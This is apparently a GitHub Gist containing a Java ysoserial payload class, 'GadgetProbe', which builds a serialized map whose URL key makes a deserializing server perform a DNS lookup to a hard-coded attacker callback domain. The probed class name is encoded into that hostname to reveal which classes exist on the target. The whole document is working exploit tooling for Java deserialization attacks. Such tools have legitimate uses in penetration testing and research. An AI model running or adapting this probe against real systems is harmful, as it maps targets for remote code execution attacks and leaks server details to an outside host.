Created
February 19, 2020 04:16
-
-
Save testanull/db14645de6795eced376ccd1b9a1515c to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package ysoserial.payloads; | |
import javassist.CannotCompileException; | |
import javassist.ClassPool; | |
import javassist.CtClass; | |
import ysoserial.payloads.util.PayloadRunner; | |
import java.io.*; | |
import java.lang.reflect.Array; | |
import java.lang.reflect.Field; | |
import java.net.*; | |
import java.util.*; | |
import static com.nqzero.permit.Permit.setAccessible; | |
public class GadgetProbe implements ObjectPayload<Object>{ | |
private String callbackDomain; | |
private ClassPool pool; | |
public GadgetProbe(String callback_domain) { | |
this.callbackDomain = callback_domain; | |
this.pool = new ClassPool(true); | |
} | |
public GadgetProbe() { | |
this.callbackDomain = "71a3b05021580a65ef26.d.zhack.ca"; | |
this.pool = new ClassPool(true); | |
} | |
private class SilentURLStreamHandler extends URLStreamHandler { | |
protected URLConnection openConnection(URL u) throws IOException { | |
return null; | |
} | |
protected synchronized InetAddress getHostAddress(URL u) { | |
return null; | |
} | |
} | |
private Class getOrGenerateClass(String className) { | |
Class clazz = null; | |
try { | |
clazz = Class.forName(className); | |
} catch (ClassNotFoundException e) { | |
CtClass cc = pool.makeClass(className); | |
try { | |
clazz = cc.toClass(); | |
return clazz; | |
} catch (CannotCompileException err) { | |
if (err.getCause() != null && err.getCause().getCause() instanceof SecurityException) { | |
System.err.println("Error: Classname is in protected package. Most likely a typo: " + className); | |
} else { | |
err.printStackTrace(); | |
} | |
} | |
} | |
return clazz; | |
} | |
@SuppressWarnings("unchecked") | |
public Object getObject(String clsname) throws Exception{ | |
String[] spl = clsname.split(";"); | |
this.callbackDomain = spl[0]; | |
clsname = spl[1]; | |
URLStreamHandler handler = new SilentURLStreamHandler(); | |
LinkedHashMap hm = new LinkedHashMap(); | |
URL u = null; | |
try { | |
u = new URL(null, "http://" + clsname.replaceAll("_","d-4-sh").replaceAll("\\$","d-0-ll") + "." + callbackDomain, handler); | |
} catch (MalformedURLException e) { | |
e.printStackTrace(); | |
} | |
Class clazz = getOrGenerateClass(clsname); | |
if (clazz == null) { | |
return null; | |
} | |
hm.put("test", clazz); | |
hm.put(u, "test"); | |
try { | |
Field field = URL.class.getDeclaredField("hashCode"); | |
setAccessible(field); | |
field.set(u, -1); | |
} catch (NoSuchFieldException | IllegalAccessException e) { | |
e.printStackTrace(); | |
} | |
return hm; | |
} | |
public static void main(String[] args) throws Exception{ | |
args = new String[]{"71a3b05021580a65ef26.d.zhack.ca;ysoserial.payloads.GadgetProbes"}; | |
PayloadRunner.run(GadgetProbe.class, args); | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment